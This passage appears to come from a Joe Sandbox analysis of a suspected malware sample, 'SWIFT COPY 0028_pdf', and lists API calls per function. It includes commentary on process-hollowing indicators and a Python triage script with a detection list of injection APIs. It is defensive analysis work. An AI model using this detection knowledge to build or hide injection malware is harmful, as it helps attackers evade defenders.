                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                    • String ID:
                                                                                    • API String ID: 3902256705-0
                                                                                    • Opcode ID: 7fa2812fe604bf32e299124b9e64e4c47d6025d03337569cfa14ae35048ea217
                                                                                    • Instruction ID: 419114f1efa21db5e35fdef0c5b4bb78a9f19cb30048c7d2d1f6680d92408e18
                                                                                    • Opcode Fuzzy Hash: 7fa2812fe604bf32e299124b9e64e4c47d6025d03337569cfa14ae35048ea217
                                                                                    • Instruction Fuzzy Hash: 22F0F47150031EA7D714BF98D815EEE77EC9F42314F20402AF90992191CBB096408AE5
                                                                                    APIs
                                                                                      • Part of subcall function 00947C0E: __getptd_noexit.LIBCMT ref: 00947C0E
                                                                                    • __lock_file.LIBCMT ref: 00943629
                                                                                      • Part of subcall function 00944E1C: __lock.LIBCMT ref: 00944E3F
                                                                                    • __fclose_nolock.LIBCMT ref: 00943634
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                    • String ID:
                                                                                    • API String ID: 2800547568-0
                                                                                    • Opcode ID: 91bafabf7cb4544acd36c30c385244abb0d26c1cfee99d6d3657adb1cc5a66c6
                                                                                    • Instruction ID: 03a97d523b38664bfb8dbc0c5ce1da1470e535710e570d32d0a350abc6d59f12
                                                                                    • Opcode Fuzzy Hash: 91bafabf7cb4544acd36c30c385244abb0d26c1cfee99d6d3657adb1cc5a66c6
                                                                                    • Instruction Fuzzy Hash: 4BF0B471801605AADB117F758807F6EBAE46F81334F26C109E465AB2C1CB7C8A019F56
                                                                                    APIs
                                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 01026943
                                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 010269D9
                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 010269FB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160878621.0000000001024000.00000040.00000020.00020000.00000000.sdmp, Offset: 01024000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1024000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                    • String ID:
                                                                                    • API String ID: 2438371351-0
                                                                                    • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                                    • Instruction ID: f599501d48a481f00e93a7ce34e1f18186828a76006cf619fe8807c6b7f8da98
                                                                                    • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                                    • Instruction Fuzzy Hash: F912DD24E24658C6EB24DF64D8507DEB272EF68300F1090E9D10DEB7A5E77A4E81CB5A
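                                                                                     The block above is the one worth a second look in this part of the report: CreateProcessW, Wow64GetThreadContext and ReadProcessMemory are called from a region at 0x01024000 that Joe Sandbox marks "based on PE: false", i.e. code that is not backed by the sample's image on disk, whereas the surrounding blocks from the 0x00920000 image (based on PE: true) are CRT and GUI runtime plumbing (_free, __lock, fclose, SystemParametersInfoW). Spawning a process, reading its thread context and reading its memory is the front half of a process-hollowing sequence; the page does not show WriteProcessMemory, SetThreadContext or ResumeThread in this block, so the API list alone supports "injection staging", not a completed hollow. The following triage script is an added example, not part of the Joe Sandbox report or its tooling: it parses the APIs / Memory Dump Source / Similarity blocks in the layout shown on this page and flags functions whose direct API calls hit an injection-related set, raising severity when the code is not PE-backed. The function names, the INJECTION_APIS list and the severity rule are the author's assumptions; the sample text is constructed from lines on this page.

```python
"""Triage helper for Joe Sandbox function-summary blocks.

Added example, not part of the Joe Sandbox report: parses the per-function
blocks (APIs / Memory Dump Source / Similarity) as pasted from the page and
flags blocks whose API mix looks like process hollowing or remote injection,
weighting code that runs from memory not backed by a PE on disk.
"""
import re

# One entry per API call line, e.g.
#   • CreateProcessW.KERNELBASE(?,00000000), ref: 01026943
#   • Part of subcall function 00947C0E: __getptd_noexit.LIBCMT ref: 00947C0E
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>[\w@:]+)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)
SOURCE_RE = re.compile(
    r"^•\s*Source File:\s*(?P<file>\S+),\s*Offset:\s*(?P<offset>[0-9A-F]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)"
)

# Assumed list: APIs that in combination implement hollowing / thread hijacking.
INJECTION_APIS = {
    "CreateProcessW", "CreateProcessA", "CreateProcessInternalW",
    "GetThreadContext", "Wow64GetThreadContext",
    "SetThreadContext", "Wow64SetThreadContext",
    "ReadProcessMemory", "WriteProcessMemory", "NtWriteVirtualMemory",
    "VirtualAllocEx", "NtAllocateVirtualMemory",
    "NtUnmapViewOfSection", "ZwUnmapViewOfSection", "NtMapViewOfSection",
    "ResumeThread", "NtResumeThread", "QueueUserAPC", "NtQueueApcThread",
}


def parse_blocks(report_text):
    """Split pasted report text into function blocks.

    Each block records its API calls (subcalls kept but marked), the memory
    dump offset, whether that dump is PE-backed, and the Similarity API ID.
    """
    blocks, current = [], None
    for raw in report_text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = {"apis": [], "offset": None, "pe_backed": None, "api_id": None}
            blocks.append(current)
            continue
        if current is None:
            continue
        m = API_RE.match(line)
        if m:
            current["apis"].append({
                "name": m.group("name"), "module": m.group("mod"),
                "ref": m.group("ref"), "subcall": m.group("sub") is not None,
            })
            continue
        m = SOURCE_RE.match(line)
        if m:
            current["offset"] = int(m.group("offset"), 16)
            current["pe_backed"] = m.group("pe") == "true"
            continue
        if line.startswith("• API ID:"):
            current["api_id"] = line.split(":", 1)[1].strip()
    return blocks


def triage(blocks, min_hits=2):
    """Report blocks that look like injection code.

    A block is reported when it directly calls at least `min_hits` APIs from
    INJECTION_APIS, or calls any of them from a region that is not PE-backed
    (unpacked or injected code is never backed by the file on disk).
    Subcall entries are ignored so CRT plumbing does not inflate the count.
    """
    findings = []
    for b in blocks:
        hits = [a["name"] for a in b["apis"]
                if not a["subcall"] and a["name"] in INJECTION_APIS]
        if not hits:
            continue
        if len(hits) >= min_hits or b["pe_backed"] is False:
            findings.append({
                "offset": b["offset"], "pe_backed": b["pe_backed"], "apis": hits,
                "severity": "high" if b["pe_backed"] is False else "medium",
            })
    return findings


# Constructed sample in the report's own layout: a benign CRT block from the
# PE-backed image at 0x00920000 and the CreateProcessW / Wow64GetThreadContext /
# ReadProcessMemory block from the non-PE-backed region at 0x01024000.
SAMPLE = """
APIs
• _free.LIBCMT ref: 0096BB83
• _free.LIBCMT ref: 0096BB95
  • Part of subcall function 00947C0E: __getptd_noexit.LIBCMT ref: 00947C0E
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
Similarity
• API ID: _free$ErrorFreeHeapLast
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 01026943
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 010269D9
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 010269FB
Memory Dump Source
• Source File: 00000000.00000002.2160878621.0000000001024000.00000040.00000020.00020000.00000000.sdmp, Offset: 01024000, based on PE: false
Similarity
• API ID: Process$ContextCreateMemoryReadThreadWow64
"""

if __name__ == "__main__":
    for f in triage(parse_blocks(SAMPLE)):
        print(f"{f['severity']:6} offset=0x{f['offset']:08X} "
              f"pe_backed={f['pe_backed']} apis={f['apis']}")
```

                                                                                     In practice you would save the whole report page as text and pass it to parse_blocks instead of SAMPLE; the script then lists every function whose direct calls match, with the 0x01024000 block above scoring "high" because it is both multi-hit and not PE-backed. Treat the output as a pointer to which blocks to open in the Joe Sandbox IDA snapshot, not as a verdict: the write-and-resume half of the hollowing sequence must be confirmed in the disassembly or in the report's behaviour signatures.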
                                                                                    APIs
                                                                                    • __flush.LIBCMT ref: 00942A0B
                                                                                      • Part of subcall function 00947C0E: __getptd_noexit.LIBCMT ref: 00947C0E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: __flush__getptd_noexit
                                                                                    • String ID:
                                                                                    • API String ID: 4101623367-0
                                                                                    • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                                    • Instruction ID: 26ec525943e37f8476360fda0083ff82b3770080afcdaa2240737790c04f9e66
                                                                                    • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                                    • Instruction Fuzzy Hash: F04183716007069FDF288FA9C981DAE7BAABF84360F64892DF855C7284EB74DD418B40
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProtectVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 544645111-0
                                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                    • Instruction ID: 66fd3e0980b132a7dc94312fe8cbf2a365077d53897b10435f481e3254d87c33
                                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                    • Instruction Fuzzy Hash: 7231B274A001059BD718DF58C480A69FBAAFF49340F648AA5E42ADB2D6DB35EDC1CF90
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free
                                                                                    • String ID:
                                                                                    • API String ID: 269201875-0
                                                                                    • Opcode ID: cd69cc2bfcb0f15d15692f7f93e97c7816aabaa1de55ff7d08be6c2f34ca07be
                                                                                    • Instruction ID: 1e9ee25752a7f157fcdf4f9d4f8040bb2d44cc3d76eb3f44aded1e8f884432fd
                                                                                    • Opcode Fuzzy Hash: cd69cc2bfcb0f15d15692f7f93e97c7816aabaa1de55ff7d08be6c2f34ca07be
                                                                                    • Instruction Fuzzy Hash: 4E318F75204628DFCF01AF11D09076E77B1FFC9320F10888AEA951B396E778A909CF91
APIs
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
• Opcode ID: 99dcb853f2ab71486a734298e96a6b6ae3dc12b3d53e4e1c98fb9f2fe29794cc
• Instruction ID: a9396203eca0ef0a1f73fef7ce93b312c43b94b9cdb26d57579108abbb59731a
• Opcode Fuzzy Hash: 99dcb853f2ab71486a734298e96a6b6ae3dc12b3d53e4e1c98fb9f2fe29794cc
• Instruction Fuzzy Hash: 06414C705087518FDB24DF18C494B1ABBE0BF85308F1989ACE99A4B362C776F885CF52
APIs
  • Part of subcall function 00924214: FreeLibrary.KERNEL32(00000000,?), ref: 00924247
• LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,009239FE,?,00000001), ref: 009241DB
  • Part of subcall function 00924291: FreeLibrary.KERNEL32(00000000), ref: 009242C4
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: Library$Free$Load
• String ID:
• API String ID: 2391024519-0
• Opcode ID: 62161de7e7cca82f7a5fadd5d20537ad3cf55da1c2ed02d537eb84fddb55eea3
• Instruction ID: 778c361e3991623ddcb6d63fc1ef6ebabf62c0cb5f8480e99f89d9ebc76f9d5b
• Opcode Fuzzy Hash: 62161de7e7cca82f7a5fadd5d20537ad3cf55da1c2ed02d537eb84fddb55eea3
• Instruction Fuzzy Hash: CD11E731610226EADF15BB75EC06F9E77E99F80700F108429F5A6AA1C5EA749A019B60
APIs
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
• Opcode ID: b870fb92460d453a1df33067e06a92f06d0d43bcba1867ad84e305ff07edcabc
• Instruction ID: 4c31e7ef198c3a4c3cebf9ab5107020d2ddefb9276c416d544fccc622327763d
• Opcode Fuzzy Hash: b870fb92460d453a1df33067e06a92f06d0d43bcba1867ad84e305ff07edcabc
• Instruction Fuzzy Hash: 032123705087018FDB24DF68C454B2ABBE1BF89304F154968F9AA4B662C736E845CF92
APIs
• ___lock_fhandle.LIBCMT ref: 0094AFC0
  • Part of subcall function 00947BDA: __getptd_noexit.LIBCMT ref: 00947BDA
  • Part of subcall function 00947C0E: __getptd_noexit.LIBCMT ref: 00947C0E
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: __getptd_noexit$___lock_fhandle
• String ID:
• API String ID: 1144279405-0
• Opcode ID: b37e21f4019d3a05bef903e49f401f32fc102f1c84521af3bdb48d96dcfeb69a
• Instruction ID: ddad1aa5b7949d66b3282db2f45dffc133d71c104046a7cd3a74859266d5576f
• Opcode Fuzzy Hash: b37e21f4019d3a05bef903e49f401f32fc102f1c84521af3bdb48d96dcfeb69a
• Instruction Fuzzy Hash: F511BF728186448BD7126FE48882F6E7B60AFC2336F254640E4745F2E2C7B8CD009BA2
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: e908df7db2011151d19b897d4a4948494f90a1a3426dd436a38c65c5f4b6a17e
• Instruction ID: 4edce95e8bed440267487046dd873a744712a9358743e8dbd1c88b7de318e5f5
• Opcode Fuzzy Hash: e908df7db2011151d19b897d4a4948494f90a1a3426dd436a38c65c5f4b6a17e
• Instruction Fuzzy Hash: FF018131400119FECF04EFA4D882DFEBB78AF60304F008029B566971A9EA309A49CB60
APIs
• __lock_file.LIBCMT ref: 00942AED
  • Part of subcall function 00947C0E: __getptd_noexit.LIBCMT ref: 00947C0E
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: __getptd_noexit__lock_file
• String ID:
• API String ID: 2597487223-0
• Opcode ID: 01fb72d23ee099dec977b6ea99da1239e8d2de5841acf3fbdab843e4337ebb4e
• Instruction ID: 9e0ad8595f2f1699f0ac90576c9d3125791198d90297d6c095f6dc53084c86ca
• Opcode Fuzzy Hash: 01fb72d23ee099dec977b6ea99da1239e8d2de5841acf3fbdab843e4337ebb4e
• Instruction Fuzzy Hash: DEF0F031940209EBDF21AFB58C06FDF3AA9BF81324F548415F8109B1D1C7788A62DB52
APIs
• FreeLibrary.KERNEL32(?,?,?,?,?,009239FE,?,00000001), ref: 00924286
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
• Opcode ID: 3585d7b8ae36a0fda7504fbe34de76c430eafd840260b56ee75f42705d67b661
• Instruction ID: 269f535012fcb5a9c114145477533ccdba0549f4a78672911ec0136dd6e92b12
• Opcode Fuzzy Hash: 3585d7b8ae36a0fda7504fbe34de76c430eafd840260b56ee75f42705d67b661
• Instruction Fuzzy Hash: 3DF03971509722CFCB349F66E890826BBE8FF043253248A3EF1E686618C7729940DF90
APIs
• GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009240C6
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: LongNamePath
• String ID:
• API String ID: 82841172-0
• Opcode ID: 2013d98a87252e6186db95fe2c12035698d61f2b5d79b0f61bbbd86768863180
• Instruction ID: 2c9327d03adf951e04c920731d68bc35e216e0348292420acd44cd158f43e1e2
• Opcode Fuzzy Hash: 2013d98a87252e6186db95fe2c12035698d61f2b5d79b0f61bbbd86768863180
• Instruction Fuzzy Hash: ABE0C236A042245BCB11A658DC46FEA77ADDFCC7A0F0901B5F90AE7248DA64A9819690
APIs
• Sleep.KERNELBASE(000001F4), ref: 01027199
Memory Dump Source
• Source File: 00000000.00000002.2160878621.0000000001024000.00000040.00000020.00020000.00000000.sdmp, Offset: 01024000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1024000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
• Instruction ID: aaf9f2c147f03a7de31865cd06508224d3c94b2784757d02513fdf7bda4a0a22
• Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
• Instruction Fuzzy Hash: E0E0E67494010DDFDB00DFB8D5496DD7BB4EF04301F1041A1FD01D2280D6309D508A72
                                                                                    APIs
                                                                                      • Part of subcall function 0093B34E: GetWindowLongW.USER32(?,000000EB), ref: 0093B35F
                                                                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 0098F87D
                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0098F8DC
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0098F919
                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0098F940
                                                                                    • SendMessageW.USER32 ref: 0098F966
                                                                                    • _wcsncpy.LIBCMT ref: 0098F9D2
                                                                                    • GetKeyState.USER32(00000011), ref: 0098F9F3
                                                                                    • GetKeyState.USER32(00000009), ref: 0098FA00
                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0098FA16
                                                                                    • GetKeyState.USER32(00000010), ref: 0098FA20
                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0098FA4F
                                                                                    • SendMessageW.USER32 ref: 0098FA72
                                                                                    • SendMessageW.USER32(?,00001030,?,0098E059), ref: 0098FB6F
                                                                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 0098FB85
                                                                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0098FB96
                                                                                    • SetCapture.USER32(?), ref: 0098FB9F
                                                                                    • ClientToScreen.USER32(?,?), ref: 0098FC03
                                                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0098FC0F
                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0098FC29
                                                                                    • ReleaseCapture.USER32 ref: 0098FC34
                                                                                    • GetCursorPos.USER32(?), ref: 0098FC69
                                                                                    • ScreenToClient.USER32(?,?), ref: 0098FC76
                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0098FCD8
                                                                                    • SendMessageW.USER32 ref: 0098FD02
                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0098FD41
                                                                                    • SendMessageW.USER32 ref: 0098FD6C
                                                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0098FD84
                                                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0098FD8F
                                                                                    • GetCursorPos.USER32(?), ref: 0098FDB0
                                                                                    • ScreenToClient.USER32(?,?), ref: 0098FDBD
                                                                                    • GetParent.USER32(?), ref: 0098FDD9
                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0098FE3F
                                                                                    • SendMessageW.USER32 ref: 0098FE6F
                                                                                    • ClientToScreen.USER32(?,?), ref: 0098FEC5
                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0098FEF1
                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0098FF19
                                                                                    • SendMessageW.USER32 ref: 0098FF3C
                                                                                    • ClientToScreen.USER32(?,?), ref: 0098FF86
                                                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0098FFB6
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0099004B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
